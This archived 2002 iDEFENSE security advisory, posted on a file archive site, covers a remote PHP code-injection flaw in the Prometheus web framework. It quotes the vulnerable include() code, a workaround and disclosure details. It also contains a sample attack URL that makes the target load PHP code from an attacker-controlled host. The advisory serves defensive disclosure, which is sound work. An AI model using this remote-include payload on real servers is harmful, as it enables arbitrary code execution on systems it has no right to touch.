what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

idefense.prometheus.txt

idefense.prometheus.txt
Posted Nov 1, 2002
Authored by David Endler, Karol Wiesek | Site idefense.com

iDEFENSE Security Advisory 10.31.2002b - Prometheus v6.0 and below is a web application framework written in PHP which allows remote attackers to execute arbitrary commands.

tags | remote, web, arbitrary, php
SHA-256 | 8a9f3b109a813e90ba5162e210fa2e3db32c9299a4328fbb8c040f64e6b82ff2

idefense.prometheus.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 10.31.02b:
http://www.idefense.com/advisory/10.31.02b.txt
Prometheus Application Framework Code Injection
October 31, 2002

I. BACKGROUND

Jason Orcutt's Prometheus is a web application framework written in
PHP. It is available at http://prometheus.zerodivide.net.

II. DESCRIPTION

A remote attacker can inject into Prometheus arbitrary PHP code that
executes under the privileges of the underlying web server. The crux
of the problem lies in the following snippet of code extracted from
the top of prometheus-library/all.lib:

if ( ! isset( $PROMETHEUS_LIBRARY_BASE ) ||
$PROMETHEUS_LIBRARY_BASE == '') {
$PROMETHEUS_LIBRARY_BASE = './prometheus-library';
}

if ( ! isset( $PHP_AUTO_LOAD_LIB ) ) {
$PHP_AUTO_LOAD_LIB = 0;
}

if ( ! isset( $PROMETHEUS_LIB_PATH ) ) {
$PROMETHEUS_LIB_PATH = 0;
}

if ( $PHP_AUTO_LOAD_LIB == 0 ) {
include( $PROMETHEUS_LIBRARY_BASE . '/autoload.lib' );
}

if ( $PROMETHEUS_LIB_PATH == 0 ) {
include( $PROMETHEUS_LIBRARY_BASE . '/prometheus-
lib.path' );
}

An attacker could force the application to load a tainted version of
autoload.lib and prometheus-lib.path that contains arbitrary PHP code
from a remote server by setting PHP_AUTO_LOAD_LIB to "0" and
PROMETHEUS_LIBRARY_BASE to the address of the remote server. The
following scripts can be targeted in this attack because all.lib is
included without any filtering:

* index.php
* install.php
* test_*.php

The following is a sample attack URL that would cause "target.server"
to load autoload.lib and prometheus-lib.path from "attackers.server".

http://target.server/prometheus-
all/index.php?PROMETHEUS_LIBRARY_BASE=http://attackers.ser
ver/&PHP_AUTO_LOAD_LIB=0

III. ANALYSIS

Remote exploitation allows an attacker to execute arbitrary commands
and code under the privileges of the web server. This also opens the
door to privilege escalation attacks.

IV. DETECTION

iDEFENSE has verified that Prometheus 6.0 is vulnerable. Versions
3.0-beta and 4.0-beta are also reportedly vulnerable. Other earlier
versions may be vulnerable as well. To determine if a specific
implementation is vulnerable, experiment with the above-described
attack.

V. WORKAROUND

* First, locate the files that make dangerous calls to include().
The following sample command line accomplishes this:

$ grep -n all.lib * -r | grep _BASE
index.php:23:include( $PROMETHEUS_APP_BASE .
'/prometheus-library/all.lib' );
scripts/view_theme.php3:6:include(
$PROMETHEUS_LIBRARY_BASE . '/all.lib' );

* Next add the following line above the calls to include():

$PROMETHEUS_LIBRARY_BASE = './prometheus-library';

This should prevent attackers from arbitrarily setting the
PROMETHEUS_LIBRARY_BASE variable to point to a remote location.

VI. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
assigned the identification number CAN-2002-1211 to this issue.

VII. DISCLOSURE TIMELINE

09/28/2002 Issue disclosed to iDEFENSE
10/14/2002 Author notified via e-mail to zerodiv@zerodivide.net
10/14/2002 iDEFENSE clients notified
10/14/2002 Response received from zerodiv@zerodivide.net
10/31/2002 Cooridinated public disclosure

VIII. CREDIT

Karol Wiesek (appelast@bsquad.sm.pl) is credited with discovering
this vulnerability.



Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler@idefense.com
www.idefense.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPcHjIErdNYRLCswqEQJuxQCgpO8XkMgWWHj1zJYLteCMfLsiYswAoJYY
pBLAN0F5p7+XiCYXoLdyAq/2
=LTcS
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close